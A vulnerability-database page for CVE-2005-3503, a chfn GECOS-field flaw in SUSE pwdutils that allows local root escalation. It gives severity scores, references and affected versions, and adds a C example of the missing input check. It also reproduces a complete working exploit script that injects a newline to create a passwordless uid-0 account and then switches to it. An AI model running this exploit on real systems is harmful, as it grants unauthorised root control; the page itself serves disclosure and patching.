CVE-2005-3503
CVSS 7.2
Published: 2005-11-05 06:02:00
Revised: 2008-09-05 16:54:34

[Original] chfn in pwdutils 3.0.4 and earlier on SuSE Linux, and possibly other operating systems, does not properly check arguments for the GECOS field, which allows local users to gain privileges.


[CNNVD] pwdutils CHFN Local User Privilege Escalation Vulnerability (CNNVD-200511-134)

        pwdutils is a suite of password management tools that can manage passwords held in NIS, NIS+ and LDAP.
        chfn in pwdutils 3.0.4 and earlier on SuSE Linux, and possibly other operating systems, does not properly check the arguments for the GECOS field, which allows local users to gain privileges.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3503
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3503
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-134
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/archive/1/415725/30/0/threaded
(VENDOR_ADVISORY)  SUSE  SUSE-SA:2005:064
http://www.securityfocus.com/bid/15314
(UNKNOWN)  BID  15314
http://www.osvdb.org/20525
(UNKNOWN)  OSVDB  20525
http://secunia.com/advisories/17469
(UNKNOWN)  SECUNIA  17469

- Vulnerability information

pwdutils CHFN Local User Privilege Escalation Vulnerability
Severity: High | Type: Input validation
Published: 2005-11-05 00:00:00 | Updated: 2005-11-15 00:00:00
Attack vector: Local

- Advisories and patches

        No data available

- Vulnerability information (1299)

SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit (EDBID:1299)
Platform: linux | Type: local
Date: 2005-11-08 | Verified
Author: Hunger
#!/bin/sh
#
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
# 
# by Hunger <susechfn@hunger.hu>
#
# Advisory:
# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
# 
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./susechfn.sh
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)

if [ X"$SHELL" = "X" ]; then
	echo "No SHELL environment, using /bin/sh for default."
	export SHELL=/bin/sh
fi

if [ -u /usr/bin/chfn ]; then
	/bin/echo "Type your current password to get root... :)"
	/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
	if [ -u /bin/su ]; then
		/bin/su r00t
		/bin/echo "You can get root again with 'su r00t'"
	else
		echo "/bin/su file is not setuid root :("
	fi
else
	echo "/usr/bin/chfn file is not setuid root :("
fi

# milw0rm.com [2005-11-08]

- Vulnerability information

20525
SUSE Linux pwdutils chfn Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

SUSE Linux contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the setuid 'chfn' binary in the 'pwdutils' suite does not properly check arguments when changing the 'GECOS' field, which may allow a malicious user to gain access to root privileges resulting in a loss of integrity.

- Timeline

2005-11-04 Unknown
Unknown Unknown

- Solution

Contact the vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.

- Related references

- Credit

Unknown or Incomplete

- Vulnerability information

CHFN User Modification Privilege Escalation Vulnerability
Input Validation Error (BID 15314)
Remote: No | Local: Yes
Published: 2005-11-04 12:00:00 | Updated: 2007-11-15 12:37:00
This issue was announced in the referenced SUSE security advisory. Thomas Gerisch is credited with the discovery of this vulnerability.

- Affected program versions

SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
shadow shadow 4.0.3
Salvatore Valente chfn
S.u.S.E. UnitedLinux 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
pwdutils pwdutils 3.0.4
pwdutils pwdutils 2.6.96
pwdutils pwdutils 2.6.90
pwdutils pwdutils 2.6.4
pwdutils pwdutils 2.6.3

- Discussion

The 'chfn' utility is prone to a privilege-escalation vulnerability because it fails to properly sanitize user-supplied input.

A local attacker can exploit this vulnerability to escalate privileges to that of the superuser account.
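The argument check that the description and discussion above say the vulnerable chfn lacks, as an added example written here (not code from pwdutils or the SUSE advisory): each GECOS sub-field is validated before it can reach /etc/passwd, so the separator and control bytes that the script on this page hands to chfn -h are rejected. GECOS_FIELD_MAX and the helper names are assumptions.

```c
/* Added example, not pwdutils or SUSE code: the per-field argument check a
 * setuid chfn must apply before writing GECOS data into /etc/passwd. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#define GECOS_FIELD_MAX 80   /* assumed limit, not pwdutils' own value */

/* A sub-field is safe only if it cannot alter record structure: ':' is the
 * passwd field separator, ',' the GECOS sub-field separator, '=' is read by
 * some parsers as key=value, and any control byte (newline, CR, ESC, 0x7f)
 * or non-ASCII byte could begin a new record or confuse later parsers. */
bool gecos_field_ok(const char *s)
{
    if (s == NULL || strlen(s) > GECOS_FIELD_MAX)
        return false;
    for (const unsigned char *p = (const unsigned char *)s; *p; p++) {
        if (*p == ':' || *p == ',' || *p == '=')
            return false;
        if (*p >= 0x80 || !isprint(*p))   /* isprint() is false for \n \r \t */
            return false;
    }
    return true;
}

/* Join name,room,work,home only if every part passes gecos_field_ok().
 * Returns 0 on success, -1 if a part is rejected or the buffer is too small. */
int build_gecos(char *out, size_t outlen, const char *name,
                const char *room, const char *work, const char *home)
{
    const char *fields[4] = { name, room, work, home };
    for (int i = 0; i < 4; i++)
        if (!gecos_field_ok(fields[i]))
            return -1;
    int n = snprintf(out, outlen, "%s,%s,%s,%s", name, room, work, home);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    /* Constructed inputs: a normal name, and the colon/newline shape from the script above. */
    const char *in[] = { "Jane Doe", ":/:/bin/sh\nr00t::0:0:" };
    char gecos[4 * GECOS_FIELD_MAX + 4];
    for (size_t i = 0; i < 2; i++)
        printf("field %zu: %s\n", i, gecos_field_ok(in[i]) ? "accepted" : "rejected");
    if (build_gecos(gecos, sizeof gecos, "Jane Doe", "101", "555-0100", "") == 0)
        printf("GECOS: %s\n", gecos);
    return 0;
}
```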

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An example script demonstrating this issue, reproduced earlier on this page, is provided by Hunger <susechfn@hunger.hu>.

- Solution

Please see the referenced advisory for more information.

pwdutils pwdutils 2.6.3
pwdutils pwdutils 2.6.90
pwdutils pwdutils 2.6.96
pwdutils pwdutils 3.0.4
shadow shadow 4.0.3
